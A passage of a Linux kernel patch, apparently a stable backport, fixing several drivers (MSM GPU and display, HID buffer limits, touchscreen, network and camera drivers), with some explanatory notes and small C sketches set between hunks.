++++ b/drivers/gpu/drm/msm/adreno/a5xx_preempt.c
+@@ -63,7 +63,7 @@ static struct msm_ringbuffer *get_next_ring(struct msm_gpu *gpu)
+ 		struct msm_ringbuffer *ring = gpu->rb[i];
+ 
+ 		spin_lock_irqsave(&ring->preempt_lock, flags);
+-		empty = (get_wptr(ring) == ring->memptrs->rptr);
++		empty = (get_wptr(ring) == gpu->funcs->get_rptr(gpu, ring));
+ 		spin_unlock_irqrestore(&ring->preempt_lock, flags);
+ 
+ 		if (!empty)
+@@ -208,6 +208,7 @@ void a5xx_preempt_hw_init(struct msm_gpu *gpu)
+ 		a5xx_gpu->preempt[i]->wptr = 0;
+ 		a5xx_gpu->preempt[i]->rptr = 0;
+ 		a5xx_gpu->preempt[i]->rbase = gpu->rb[i]->iova;
++		a5xx_gpu->preempt[i]->rptr_addr = shadowptr(a5xx_gpu, gpu->rb[i]);
+ 	}
+ 
+ 	/* Write a 0 to signal that we aren't switching pagetables */
+@@ -259,7 +260,6 @@ static int preempt_init_ring(struct a5xx_gpu *a5xx_gpu,
+ 	ptr->data = 0;
+ 	ptr->cntl = MSM_GPU_RB_CNTL_DEFAULT | AXXX_CP_RB_CNTL_NO_UPDATE;
+ 
+-	ptr->rptr_addr = shadowptr(a5xx_gpu, ring);
+ 	ptr->counter = counters_iova;
+ 
+ 	return 0;
+diff --git a/drivers/gpu/drm/msm/adreno/adreno_device.c b/drivers/gpu/drm/msm/adreno/adreno_device.c
+index 628806423f7d2..c5c4c93b3689c 100644
+--- a/drivers/gpu/drm/msm/adreno/adreno_device.c
++++ b/drivers/gpu/drm/msm/adreno/adreno_device.c
+@@ -551,13 +551,15 @@ static int adreno_bind(struct device *dev, struct device *master, void *data)
+ 	return 0;
+ }
+ 
++static int adreno_system_suspend(struct device *dev);
+ static void adreno_unbind(struct device *dev, struct device *master,
+ 		void *data)
+ {
+ 	struct msm_drm_private *priv = dev_get_drvdata(master);
+ 	struct msm_gpu *gpu = dev_to_gpu(dev);
+ 
+-	pm_runtime_force_suspend(dev);
++	if (pm_runtime_enabled(dev))
++		WARN_ON_ONCE(adreno_system_suspend(dev));
+ 	gpu->funcs->destroy(gpu);
+ 
+ 	priv->gpu_pdev = NULL;
+@@ -609,7 +611,7 @@ static int adreno_remove(struct platform_device *pdev)
+ 
+ static void adreno_shutdown(struct platform_device *pdev)
+ {
+-	pm_runtime_force_suspend(&pdev->dev);
++	WARN_ON_ONCE(adreno_system_suspend(&pdev->dev));
+ }
+ 
+ static const struct of_device_id dt_match[] = {
+diff --git a/drivers/gpu/drm/msm/disp/dpu1/dpu_hw_catalog.c b/drivers/gpu/drm/msm/disp/dpu1/dpu_hw_catalog.c
+index 365738f40976a..41c93a18d5cb3 100644
+--- a/drivers/gpu/drm/msm/disp/dpu1/dpu_hw_catalog.c
++++ b/drivers/gpu/drm/msm/disp/dpu1/dpu_hw_catalog.c
+@@ -12,11 +12,15 @@
+ #include "dpu_hw_catalog.h"
+ #include "dpu_kms.h"
+ 
+-#define VIG_MASK \
++#define VIG_BASE_MASK \
+ 	(BIT(DPU_SSPP_SRC) | BIT(DPU_SSPP_QOS) |\
+-	BIT(DPU_SSPP_CSC_10BIT) | BIT(DPU_SSPP_CDP) |\
++	BIT(DPU_SSPP_CDP) |\
+ 	BIT(DPU_SSPP_TS_PREFILL) | BIT(DPU_SSPP_EXCL_RECT))
+ 
++#define VIG_MASK \
++	(VIG_BASE_MASK | \
++	BIT(DPU_SSPP_CSC_10BIT))
++
+ #define VIG_MSM8998_MASK \
+ 	(VIG_MASK | BIT(DPU_SSPP_SCALER_QSEED3))
+ 
+@@ -29,7 +33,7 @@
+ #define VIG_SM8250_MASK \
+ 	(VIG_MASK | BIT(DPU_SSPP_QOS_8LVL) | BIT(DPU_SSPP_SCALER_QSEED3LITE))
+ 
+-#define VIG_QCM2290_MASK (VIG_MASK | BIT(DPU_SSPP_QOS_8LVL))
++#define VIG_QCM2290_MASK (VIG_BASE_MASK | BIT(DPU_SSPP_QOS_8LVL))
+ 
+ #define DMA_MSM8998_MASK \
+ 	(BIT(DPU_SSPP_SRC) | BIT(DPU_SSPP_QOS) |\
+@@ -51,7 +55,7 @@
+ 	(DMA_MSM8998_MASK | BIT(DPU_SSPP_CURSOR))
+ 
+ #define MIXER_MSM8998_MASK \
+-	(BIT(DPU_MIXER_SOURCESPLIT) | BIT(DPU_DIM_LAYER))
++	(BIT(DPU_MIXER_SOURCESPLIT))
+ 
+ #define MIXER_SDM845_MASK \
+ 	(BIT(DPU_MIXER_SOURCESPLIT) | BIT(DPU_DIM_LAYER) | BIT(DPU_MIXER_COMBINED_ALPHA))
+@@ -283,7 +287,6 @@ static const struct dpu_caps qcm2290_dpu_caps = {
+ 	.max_mixer_width = DEFAULT_DPU_OUTPUT_LINE_WIDTH,
+ 	.max_mixer_blendstages = 0x4,
+ 	.smart_dma_rev = DPU_SSPP_SMART_DMA_V2,
+-	.ubwc_version = DPU_HW_UBWC_VER_20,
+ 	.has_dim_layer = true,
+ 	.has_idle_pc = true,
+ 	.max_linewidth = 2160,
+@@ -604,19 +607,19 @@ static const struct dpu_ctl_cfg sdm845_ctl[] = {
+ static const struct dpu_ctl_cfg sc7180_ctl[] = {
+ 	{
+ 	.name = "ctl_0", .id = CTL_0,
+-	.base = 0x1000, .len = 0xE4,
++	.base = 0x1000, .len = 0x1dc,
+ 	.features = BIT(DPU_CTL_ACTIVE_CFG),
+ 	.intr_start = DPU_IRQ_IDX(MDP_SSPP_TOP0_INTR2, 9),
+ 	},
+ 	{
+ 	.name = "ctl_1", .id = CTL_1,
+-	.base = 0x1200, .len = 0xE4,
++	.base = 0x1200, .len = 0x1dc,
+ 	.features = BIT(DPU_CTL_ACTIVE_CFG),
+ 	.intr_start = DPU_IRQ_IDX(MDP_SSPP_TOP0_INTR2, 10),
+ 	},
+ 	{
+ 	.name = "ctl_2", .id = CTL_2,
+-	.base = 0x1400, .len = 0xE4,
++	.base = 0x1400, .len = 0x1dc,
+ 	.features = BIT(DPU_CTL_ACTIVE_CFG),
+ 	.intr_start = DPU_IRQ_IDX(MDP_SSPP_TOP0_INTR2, 11),
+ 	},
+@@ -810,9 +813,9 @@ static const struct dpu_sspp_cfg msm8998_sspp[] = {
+ 	SSPP_BLK("sspp_9", SSPP_DMA1, 0x26000,  DMA_MSM8998_MASK,
+ 		sdm845_dma_sblk_1, 5, SSPP_TYPE_DMA, DPU_CLK_CTRL_DMA1),
+ 	SSPP_BLK("sspp_10", SSPP_DMA2, 0x28000,  DMA_CURSOR_MSM8998_MASK,
+-		sdm845_dma_sblk_2, 9, SSPP_TYPE_DMA, DPU_CLK_CTRL_CURSOR0),
++		sdm845_dma_sblk_2, 9, SSPP_TYPE_DMA, DPU_CLK_CTRL_DMA2),
+ 	SSPP_BLK("sspp_11", SSPP_DMA3, 0x2a000,  DMA_CURSOR_MSM8998_MASK,
+-		sdm845_dma_sblk_3, 13, SSPP_TYPE_DMA, DPU_CLK_CTRL_CURSOR1),
++		sdm845_dma_sblk_3, 13, SSPP_TYPE_DMA, DPU_CLK_CTRL_DMA3),
+ };
+ 
+ static const struct dpu_sspp_cfg sdm845_sspp[] = {
+@@ -1918,8 +1921,6 @@ static const struct dpu_mdss_cfg qcm2290_dpu_cfg = {
+ 	.intf = qcm2290_intf,
+ 	.vbif_count = ARRAY_SIZE(sdm845_vbif),
+ 	.vbif = sdm845_vbif,
+-	.reg_dma_count = 1,
+-	.dma_cfg = &sdm845_regdma,
+ 	.perf = &qcm2290_perf_data,
+ 	.mdss_irqs = IRQ_SC7180_MASK,
+ };
+diff --git a/drivers/gpu/drm/msm/disp/dpu1/dpu_rm.c b/drivers/gpu/drm/msm/disp/dpu1/dpu_rm.c
+index 7ada957adbbb8..58abf5fe97e20 100644
+--- a/drivers/gpu/drm/msm/disp/dpu1/dpu_rm.c
++++ b/drivers/gpu/drm/msm/disp/dpu1/dpu_rm.c
+@@ -572,6 +572,8 @@ void dpu_rm_release(struct dpu_global_state *global_state,
+ 		ARRAY_SIZE(global_state->ctl_to_enc_id), enc->base.id);
+ 	_dpu_rm_clear_mapping(global_state->dsc_to_enc_id,
+ 		ARRAY_SIZE(global_state->dsc_to_enc_id), enc->base.id);
++	_dpu_rm_clear_mapping(global_state->dspp_to_enc_id,
++		ARRAY_SIZE(global_state->dspp_to_enc_id), enc->base.id);
+ }
+ 
+ int dpu_rm_reserve(
+diff --git a/drivers/gpu/drm/msm/msm_gem_submit.c b/drivers/gpu/drm/msm/msm_gem_submit.c
+index 7c2cc1262c05d..d8c9d184190bb 100644
+--- a/drivers/gpu/drm/msm/msm_gem_submit.c
++++ b/drivers/gpu/drm/msm/msm_gem_submit.c
+@@ -627,8 +627,8 @@ static struct msm_submit_post_dep *msm_parse_post_deps(struct drm_device *dev,
+ 	int ret = 0;
+ 	uint32_t i, j;
+ 
+-	post_deps = kmalloc_array(nr_syncobjs, sizeof(*post_deps),
+-	                          GFP_KERNEL | __GFP_NOWARN | __GFP_NORETRY);
++	post_deps = kcalloc(nr_syncobjs, sizeof(*post_deps),
++			    GFP_KERNEL | __GFP_NOWARN | __GFP_NORETRY);
+ 	if (!post_deps)
+ 		return ERR_PTR(-ENOMEM);
+ 
+@@ -643,7 +643,6 @@ static struct msm_submit_post_dep *msm_parse_post_deps(struct drm_device *dev,
+ 		}
+ 
+ 		post_deps[i].point = syncobj_desc.point;
+-		post_deps[i].chain = NULL;
+ 
+ 		if (syncobj_desc.flags) {
+ 			ret = -EINVAL;
+diff --git a/drivers/gpu/drm/nouveau/dispnv50/wndw.h b/drivers/gpu/drm/nouveau/dispnv50/wndw.h
+index 591c852f326b9..76a6ae5d56526 100644
+--- a/drivers/gpu/drm/nouveau/dispnv50/wndw.h
++++ b/drivers/gpu/drm/nouveau/dispnv50/wndw.h
+@@ -35,8 +35,9 @@ struct nv50_wndw {
+ 
+ int nv50_wndw_new_(const struct nv50_wndw_func *, struct drm_device *,
+ 		   enum drm_plane_type, const char *name, int index,
+-		   const u32 *format, enum nv50_disp_interlock_type,
+-		   u32 interlock_data, u32 heads, struct nv50_wndw **);
++		   const u32 *format, u32 heads,
++		   enum nv50_disp_interlock_type, u32 interlock_data,
++		   struct nv50_wndw **);
+ void nv50_wndw_flush_set(struct nv50_wndw *, u32 *interlock,
+ 			 struct nv50_wndw_atom *);
+ void nv50_wndw_flush_clr(struct nv50_wndw *, u32 *interlock, bool flush,
+diff --git a/drivers/hid/hid-core.c b/drivers/hid/hid-core.c
+index 5c72aef3d3dd5..799a3086dbb06 100644
+--- a/drivers/hid/hid-core.c
++++ b/drivers/hid/hid-core.c
+@@ -261,6 +261,7 @@ static int hid_add_field(struct hid_parser *parser, unsigned report_type, unsign
+ {
+ 	struct hid_report *report;
+ 	struct hid_field *field;
++	unsigned int max_buffer_size = HID_MAX_BUFFER_SIZE;
+ 	unsigned int usages;
+ 	unsigned int offset;
+ 	unsigned int i;
+@@ -291,8 +292,11 @@ static int hid_add_field(struct hid_parser *parser, unsigned report_type, unsign
+ 	offset = report->size;
+ 	report->size += parser->global.report_size * parser->global.report_count;
+ 
++	if (parser->device->ll_driver->max_buffer_size)
++		max_buffer_size = parser->device->ll_driver->max_buffer_size;
++
+ 	/* Total size check: Allow for possible report index byte */
+-	if (report->size > (HID_MAX_BUFFER_SIZE - 1) << 3) {
++	if (report->size > (max_buffer_size - 1) << 3) {
+ 		hid_err(parser->device, "report is too long\n");
+ 		return -1;
+ 	}
+@@ -1966,6 +1970,7 @@ int hid_report_raw_event(struct hid_device *hid, enum hid_report_type type, u8 *
+ 	struct hid_report_enum *report_enum = hid->report_enum + type;
+ 	struct hid_report *report;
+ 	struct hid_driver *hdrv;
++	int max_buffer_size = HID_MAX_BUFFER_SIZE;
+ 	u32 rsize, csize = size;
+ 	u8 *cdata = data;
+ 	int ret = 0;
+@@ -1981,10 +1986,13 @@ int hid_report_raw_event(struct hid_device *hid, enum hid_report_type type, u8 *
+ 
+ 	rsize = hid_compute_report_size(report);
+ 
+-	if (report_enum->numbered && rsize >= HID_MAX_BUFFER_SIZE)
+-		rsize = HID_MAX_BUFFER_SIZE - 1;
+-	else if (rsize > HID_MAX_BUFFER_SIZE)
+-		rsize = HID_MAX_BUFFER_SIZE;
++	if (hid->ll_driver->max_buffer_size)
++		max_buffer_size = hid->ll_driver->max_buffer_size;
++
++	if (report_enum->numbered && rsize >= max_buffer_size)
++		rsize = max_buffer_size - 1;
++	else if (rsize > max_buffer_size)
++		rsize = max_buffer_size;
+ 
+ 	if (csize < rsize) {
+ 		dbg_hid("report %d is too short, (%d < %d)\n", report->id,
+@@ -2387,7 +2395,12 @@ int hid_hw_raw_request(struct hid_device *hdev,
+ 		       unsigned char reportnum, __u8 *buf,
+ 		       size_t len, enum hid_report_type rtype, enum hid_class_request reqtype)
+ {
+-	if (len < 1 || len > HID_MAX_BUFFER_SIZE || !buf)
++	unsigned int max_buffer_size = HID_MAX_BUFFER_SIZE;
++
++	if (hdev->ll_driver->max_buffer_size)
++		max_buffer_size = hdev->ll_driver->max_buffer_size;
++
++	if (len < 1 || len > max_buffer_size || !buf)
+ 		return -EINVAL;
+ 
+ 	return hdev->ll_driver->raw_request(hdev, reportnum, buf, len,
+@@ -2406,7 +2419,12 @@ EXPORT_SYMBOL_GPL(hid_hw_raw_request);
+  */
+ int hid_hw_output_report(struct hid_device *hdev, __u8 *buf, size_t len)
+ {
+-	if (len < 1 || len > HID_MAX_BUFFER_SIZE || !buf)
++	unsigned int max_buffer_size = HID_MAX_BUFFER_SIZE;
++
++	if (hdev->ll_driver->max_buffer_size)
++		max_buffer_size = hdev->ll_driver->max_buffer_size;
++
++	if (len < 1 || len > max_buffer_size || !buf)
+ 		return -EINVAL;
+ 
+ 	if (hdev->ll_driver->output_report)
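
The max_buffer_size checks above compare a report size accumulated in bits against a limit given in bytes, reserving one byte for a possible report index; hence the (max_buffer_size - 1) << 3 bound. A small self-contained sketch of that arithmetic follows; the 64-byte limit is an assumed example, not a driver constant.

/*
 * HID report sizes are accumulated in bits, while buffer limits are
 * in bytes, and one byte is reserved for a possible report index.
 * With a 64-byte limit the largest legal report body is therefore
 * (64 - 1) * 8 = 504 bits.
 */
#include <stdio.h>

int main(void)
{
	unsigned int max_buffer_size = 64;   /* bytes, assumed example cap */
	unsigned int report_bits = 8 * 63;   /* report body size, in bits */

	if (report_bits > (max_buffer_size - 1) << 3)
		printf("report is too long\n");
	else
		printf("report fits: %u bits <= %u bits\n",
		       report_bits, (max_buffer_size - 1) << 3);
	return 0;
}
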
+diff --git a/drivers/hid/uhid.c b/drivers/hid/uhid.c
+index 2a918aeb0af13..59ac757c1d471 100644
+--- a/drivers/hid/uhid.c
++++ b/drivers/hid/uhid.c
+@@ -395,6 +395,7 @@ struct hid_ll_driver uhid_hid_driver = {
+ 	.parse = uhid_hid_parse,
+ 	.raw_request = uhid_hid_raw_request,
+ 	.output_report = uhid_hid_output_report,
++	.max_buffer_size = UHID_DATA_MAX,
+ };
+ EXPORT_SYMBOL_GPL(uhid_hid_driver);
+ 
+diff --git a/drivers/input/touchscreen/exc3000.c b/drivers/input/touchscreen/exc3000.c
+index 4b7eee01c6aad..615646a03039b 100644
+--- a/drivers/input/touchscreen/exc3000.c
++++ b/drivers/input/touchscreen/exc3000.c
+@@ -109,6 +109,11 @@ static inline void exc3000_schedule_timer(struct exc3000_data *data)
+ 	mod_timer(&data->timer, jiffies + msecs_to_jiffies(EXC3000_TIMEOUT_MS));
+ }
+ 
++static void exc3000_shutdown_timer(void *timer)
++{
++	del_timer_sync(timer);
++}
++
+ static int exc3000_read_frame(struct exc3000_data *data, u8 *buf)
+ {
+ 	struct i2c_client *client = data->client;
+@@ -386,6 +391,11 @@ static int exc3000_probe(struct i2c_client *client)
+ 	if (error)
+ 		return error;
+ 
++	error = devm_add_action_or_reset(&client->dev, exc3000_shutdown_timer,
++					 &data->timer);
++	if (error)
++		return error;
++
+ 	error = devm_request_threaded_irq(&client->dev, client->irq,
+ 					  NULL, exc3000_interrupt, IRQF_ONESHOT,
+ 					  client->name, data);
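
The devm_add_action_or_reset() call above registers del_timer_sync() as a managed cleanup; because devm resources unwind in reverse order of registration, the IRQ requested afterwards is released first, so no handler can re-arm the timer while it is being deleted. A plain-C sketch of that LIFO unwind, with illustrative names, follows.

#include <stdio.h>

#define MAX_ACTIONS 8

static void (*actions[MAX_ACTIONS])(void);
static int nr_actions;

static int add_action(void (*fn)(void))
{
	if (nr_actions >= MAX_ACTIONS)
		return -1;
	actions[nr_actions++] = fn;
	return 0;
}

static void unwind(void)                 /* runs on remove or probe failure */
{
	while (nr_actions > 0)
		actions[--nr_actions]();     /* LIFO: last registered runs first */
}

static void stop_timer(void)   { printf("del_timer_sync()\n"); }
static void free_irq_res(void) { printf("free irq\n"); }

int main(void)
{
	add_action(stop_timer);              /* registered first ... */
	add_action(free_irq_res);            /* ... so it runs last */
	unwind();                            /* prints: free irq, then del_timer_sync() */
	return 0;
}
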
+diff --git a/drivers/macintosh/windfarm_lm75_sensor.c b/drivers/macintosh/windfarm_lm75_sensor.c
+index 204661c8e918f..9dd80837a759a 100644
+--- a/drivers/macintosh/windfarm_lm75_sensor.c
++++ b/drivers/macintosh/windfarm_lm75_sensor.c
+@@ -33,8 +33,8 @@
+ #endif
+ 
+ struct wf_lm75_sensor {
+-	int			ds1775 : 1;
+-	int			inited : 1;
++	unsigned int		ds1775 : 1;
++	unsigned int		inited : 1;
+ 	struct i2c_client	*i2c;
+ 	struct wf_sensor	sens;
+ };
+diff --git a/drivers/macintosh/windfarm_smu_sensors.c b/drivers/macintosh/windfarm_smu_sensors.c
+index 00c6fe25fcba0..2bdb73b34d291 100644
+--- a/drivers/macintosh/windfarm_smu_sensors.c
++++ b/drivers/macintosh/windfarm_smu_sensors.c
+@@ -274,8 +274,8 @@ struct smu_cpu_power_sensor {
+ 	struct list_head	link;
+ 	struct wf_sensor	*volts;
+ 	struct wf_sensor	*amps;
+-	int			fake_volts : 1;
+-	int			quadratic : 1;
++	unsigned int		fake_volts : 1;
++	unsigned int		quadratic : 1;
+ 	struct wf_sensor	sens;
+ };
+ #define to_smu_cpu_power(c) container_of(c, struct smu_cpu_power_sensor, sens)
+diff --git a/drivers/media/i2c/ov5640.c b/drivers/media/i2c/ov5640.c
+index 873087e180561..267f514023e72 100644
+--- a/drivers/media/i2c/ov5640.c
++++ b/drivers/media/i2c/ov5640.c
+@@ -3482,7 +3482,7 @@ static int ov5640_init_controls(struct ov5640_dev *sensor)
+ 	/* Auto/manual gain */
+ 	ctrls->auto_gain = v4l2_ctrl_new_std(hdl, ops, V4L2_CID_AUTOGAIN,
+ 					     0, 1, 1, 1);
+-	ctrls->gain = v4l2_ctrl_new_std(hdl, ops, V4L2_CID_GAIN,
++	ctrls->gain = v4l2_ctrl_new_std(hdl, ops, V4L2_CID_ANALOGUE_GAIN,
+ 					0, 1023, 1, 0);
+ 
+ 	ctrls->saturation = v4l2_ctrl_new_std(hdl, ops, V4L2_CID_SATURATION,
+diff --git a/drivers/media/rc/gpio-ir-recv.c b/drivers/media/rc/gpio-ir-recv.c
+index 22e524b69806a..a56c844d7f816 100644
+--- a/drivers/media/rc/gpio-ir-recv.c
++++ b/drivers/media/rc/gpio-ir-recv.c
+@@ -130,6 +130,23 @@ static int gpio_ir_recv_probe(struct platform_device *pdev)
+ 				"gpio-ir-recv-irq", gpio_dev);
+ }
+ 
++static int gpio_ir_recv_remove(struct platform_device *pdev)
++{
++	struct gpio_rc_dev *gpio_dev = platform_get_drvdata(pdev);
++	struct device *pmdev = gpio_dev->pmdev;
++
++	if (pmdev) {
++		pm_runtime_get_sync(pmdev);
++		cpu_latency_qos_remove_request(&gpio_dev->qos);
++
++		pm_runtime_disable(pmdev);
++		pm_runtime_put_noidle(pmdev);
++		pm_runtime_set_suspended(pmdev);
++	}
++
++	return 0;
++}
++
+ #ifdef CONFIG_PM
+ static int gpio_ir_recv_suspend(struct device *dev)
+ {
+@@ -189,6 +206,7 @@ MODULE_DEVICE_TABLE(of, gpio_ir_recv_of_match);
+ 
+ static struct platform_driver gpio_ir_recv_driver = {
+ 	.probe  = gpio_ir_recv_probe,
++	.remove = gpio_ir_recv_remove,
+ 	.driver = {
+ 		.name   = KBUILD_MODNAME,
+ 		.of_match_table = of_match_ptr(gpio_ir_recv_of_match),
+diff --git a/drivers/net/dsa/mt7530.c b/drivers/net/dsa/mt7530.c
+index a884f6f6a8c2c..1e0b8bcd59e6c 100644
+--- a/drivers/net/dsa/mt7530.c
++++ b/drivers/net/dsa/mt7530.c
+@@ -393,6 +393,24 @@ mt7530_fdb_write(struct mt7530_priv *priv, u16 vid,
+ 		mt7530_write(priv, MT7530_ATA1 + (i * 4), reg[i]);
+ }
+ 
++/* Set up switch core clock for MT7530 */
++static void mt7530_pll_setup(struct mt7530_priv *priv)
++{
++	/* Disable PLL */
++	core_write(priv, CORE_GSWPLL_GRP1, 0);
++
++	/* Set core clock into 500Mhz */
++	core_write(priv, CORE_GSWPLL_GRP2,
++		   RG_GSWPLL_POSDIV_500M(1) |
++		   RG_GSWPLL_FBKDIV_500M(25));
++
++	/* Enable PLL */
++	core_write(priv, CORE_GSWPLL_GRP1,
++		   RG_GSWPLL_EN_PRE |
++		   RG_GSWPLL_POSDIV_200M(2) |
++		   RG_GSWPLL_FBKDIV_200M(32));
++}
++
+ /* Setup TX circuit including relevant PAD and driving */
+ static int
+ mt7530_pad_clk_setup(struct dsa_switch *ds, phy_interface_t interface)
+@@ -453,21 +471,6 @@ mt7530_pad_clk_setup(struct dsa_switch *ds, phy_interface_t interface)
+ 	core_clear(priv, CORE_TRGMII_GSW_CLK_CG,
+ 		   REG_GSWCK_EN | REG_TRGMIICK_EN);
+ 
+-	/* Setup core clock for MT7530 */
+-	/* Disable PLL */
+-	core_write(priv, CORE_GSWPLL_GRP1, 0);
+-
+-	/* Set core clock into 500Mhz */
+-	core_write(priv, CORE_GSWPLL_GRP2,
+-		   RG_GSWPLL_POSDIV_500M(1) |
+-		   RG_GSWPLL_FBKDIV_500M(25));
+-
+-	/* Enable PLL */
+-	core_write(priv, CORE_GSWPLL_GRP1,
+-		   RG_GSWPLL_EN_PRE |
+-		   RG_GSWPLL_POSDIV_200M(2) |
+-		   RG_GSWPLL_FBKDIV_200M(32));
+-
+ 	/* Setup the MT7530 TRGMII Tx Clock */
+ 	core_write(priv, CORE_PLL_GROUP5, RG_LCDDS_PCW_NCPO1(ncpo1));
+ 	core_write(priv, CORE_PLL_GROUP6, RG_LCDDS_PCW_NCPO0(0));
+@@ -2201,6 +2204,8 @@ mt7530_setup(struct dsa_switch *ds)
+ 		     SYS_CTRL_PHY_RST | SYS_CTRL_SW_RST |
+ 		     SYS_CTRL_REG_RST);
+ 
++	mt7530_pll_setup(priv);
++
+ 	/* Enable Port 6 only; P5 as GMAC5 which currently is not supported */
+ 	val = mt7530_read(priv, MT7530_MHWTRAP);
+ 	val &= ~MHWTRAP_P6_DIS & ~MHWTRAP_PHY_ACCESS;
+diff --git a/drivers/net/ethernet/broadcom/bgmac.c b/drivers/net/ethernet/broadcom/bgmac.c
+index 3038386a5afd8..1761df8fb7f96 100644
+--- a/drivers/net/ethernet/broadcom/bgmac.c
++++ b/drivers/net/ethernet/broadcom/bgmac.c
+@@ -890,13 +890,13 @@ static void bgmac_chip_reset_idm_config(struct bgmac *bgmac)
+ 
+ 		if (iost & BGMAC_BCMA_IOST_ATTACHED) {
+ 			flags = BGMAC_BCMA_IOCTL_SW_CLKEN;
+-			if (!bgmac->has_robosw)
++			if (bgmac->in_init || !bgmac->has_robosw)
+ 				flags |= BGMAC_BCMA_IOCTL_SW_RESET;
+ 		}
+ 		bgmac_clk_enable(bgmac, flags);
+ 	}
+ 
+-	if (iost & BGMAC_BCMA_IOST_ATTACHED && !bgmac->has_robosw)
++	if (iost & BGMAC_BCMA_IOST_ATTACHED && (bgmac->in_init || !bgmac->has_robosw))
+ 		bgmac_idm_write(bgmac, BCMA_IOCTL,
+ 				bgmac_idm_read(bgmac, BCMA_IOCTL) &
+ 				~BGMAC_BCMA_IOCTL_SW_RESET);
+@@ -1490,6 +1490,8 @@ int bgmac_enet_probe(struct bgmac *bgmac)
+ 	struct net_device *net_dev = bgmac->net_dev;
+ 	int err;
+ 
++	bgmac->in_init = true;
++
+ 	bgmac_chip_intrs_off(bgmac);
+ 
+ 	net_dev->irq = bgmac->irq;
+@@ -1542,6 +1544,8 @@ int bgmac_enet_probe(struct bgmac *bgmac)
+ 	/* Omit FCS from max MTU size */
+ 	net_dev->max_mtu = BGMAC_RX_MAX_FRAME_SIZE - ETH_FCS_LEN;
+ 
++	bgmac->in_init = false;
++
+ 	err = register_netdev(bgmac->net_dev);
+ 	if (err) {
+ 		dev_err(bgmac->dev, "Cannot register net device\n");
+diff --git a/drivers/net/ethernet/broadcom/bgmac.h b/drivers/net/ethernet/broadcom/bgmac.h
+index e05ac92c06504..d73ef262991d6 100644
+--- a/drivers/net/ethernet/broadcom/bgmac.h
++++ b/drivers/net/ethernet/broadcom/bgmac.h
+@@ -472,6 +472,8 @@ struct bgmac {
+ 	int irq;
+ 	u32 int_mask;
+ 
++	bool in_init;
++
+ 	/* Current MAC state */
+ 	int mac_speed;
+ 	int mac_duplex;
+diff --git a/drivers/net/ethernet/broadcom/bnxt/bnxt.c b/drivers/net/ethernet/broadcom/bnxt/bnxt.c
+index cecda545372f9..251b102d2792b 100644
+--- a/drivers/net/ethernet/broadcom/bnxt/bnxt.c
++++ b/drivers/net/ethernet/broadcom/bnxt/bnxt.c
+@@ -3143,7 +3143,7 @@ static int bnxt_alloc_ring(struct bnxt *bp, struct bnxt_ring_mem_info *rmem)
+ 
+ static void bnxt_free_tpa_info(struct bnxt *bp)
+ {
+-	int i;
++	int i, j;
+ 
+ 	for (i = 0; i < bp->rx_nr_rings; i++) {
+ 		struct bnxt_rx_ring_info *rxr = &bp->rx_ring[i];
+@@ -3151,8 +3151,10 @@ static void bnxt_free_tpa_info(struct bnxt *bp)
+ 		kfree(rxr->rx_tpa_idx_map);
+ 		rxr->rx_tpa_idx_map = NULL;
+ 		if (rxr->rx_tpa) {
+-			kfree(rxr->rx_tpa[0].agg_arr);
+-			rxr->rx_tpa[0].agg_arr = NULL;
++			for (j = 0; j < bp->max_tpa; j++) {
++				kfree(rxr->rx_tpa[j].agg_arr);
++				rxr->rx_tpa[j].agg_arr = NULL;
++			}
+ 		}
+ 		kfree(rxr->rx_tpa);
+ 		rxr->rx_tpa = NULL;
+@@ -3161,14 +3163,13 @@ static void bnxt_free_tpa_info(struct bnxt *bp)
+ 
+ static int bnxt_alloc_tpa_info(struct bnxt *bp)
+ {
+-	int i, j, total_aggs = 0;
++	int i, j;
+ 
+ 	bp->max_tpa = MAX_TPA;
+ 	if (bp->flags & BNXT_FLAG_CHIP_P5) {
+ 		if (!bp->max_tpa_v2)
+ 			return 0;
+ 		bp->max_tpa = max_t(u16, bp->max_tpa_v2, MAX_TPA_P5);
+-		total_aggs = bp->max_tpa * MAX_SKB_FRAGS;
+ 	}
+ 
+ 	for (i = 0; i < bp->rx_nr_rings; i++) {
+@@ -3182,12 +3183,12 @@ static int bnxt_alloc_tpa_info(struct bnxt *bp)
+ 
+ 		if (!(bp->flags & BNXT_FLAG_CHIP_P5))
+ 			continue;
+-		agg = kcalloc(total_aggs, sizeof(*agg), GFP_KERNEL);
+-		rxr->rx_tpa[0].agg_arr = agg;
+-		if (!agg)
+-			return -ENOMEM;
+-		for (j = 1; j < bp->max_tpa; j++)
+-			rxr->rx_tpa[j].agg_arr = agg + j * MAX_SKB_FRAGS;
++		for (j = 0; j < bp->max_tpa; j++) {
++			agg = kcalloc(MAX_SKB_FRAGS, sizeof(*agg), GFP_KERNEL);
++			if (!agg)
++				return -ENOMEM;
++			rxr->rx_tpa[j].agg_arr = agg;
++		}
+ 		rxr->rx_tpa_idx_map = kzalloc(sizeof(*rxr->rx_tpa_idx_map),
+ 					      GFP_KERNEL);
+ 		if (!rxr->rx_tpa_idx_map)
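
The bnxt change above replaces a single large allocation carved into per-TPA slices (where only slice 0 could legally be passed to kfree()) with one kcalloc() per entry, making allocation and free symmetric. A userspace sketch of the pattern follows; the sizes and names are made up.

#include <stdlib.h>

struct tpa_info { int *agg_arr; };

static int alloc_tpa(struct tpa_info *tpa, int n, int frags)
{
	int j;

	for (j = 0; j < n; j++) {
		tpa[j].agg_arr = calloc(frags, sizeof(int));
		if (!tpa[j].agg_arr)
			return -1;           /* caller frees whatever was allocated */
	}
	return 0;
}

static void free_tpa(struct tpa_info *tpa, int n)
{
	int j;

	for (j = 0; j < n; j++) {        /* every entry owns its own buffer */
		free(tpa[j].agg_arr);
		tpa[j].agg_arr = NULL;
	}
}

int main(void)
{
	struct tpa_info tpa[4] = { { 0 } };

	alloc_tpa(tpa, 4, 16);   /* on partial failure, free_tpa() still cleans up */
	free_tpa(tpa, 4);
	return 0;
}
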
+diff --git a/drivers/net/ethernet/intel/ice/ice_dcb.c b/drivers/net/ethernet/intel/ice/ice_dcb.c
+index 0b146a0d42058..6375372f87294 100644
+--- a/drivers/net/ethernet/intel/ice/ice_dcb.c
++++ b/drivers/net/ethernet/intel/ice/ice_dcb.c
+@@ -1372,7 +1372,7 @@ ice_add_dscp_pfc_tlv(struct ice_lldp_org_tlv *tlv, struct ice_dcbx_cfg *dcbcfg)
+ 	tlv->ouisubtype = htonl(ouisubtype);
+ 
+ 	buf[0] = dcbcfg->pfc.pfccap & 0xF;
+-	buf[1] = dcbcfg->pfc.pfcena & 0xF;
++	buf[1] = dcbcfg->pfc.pfcena;
+ }
+ 
+ /**
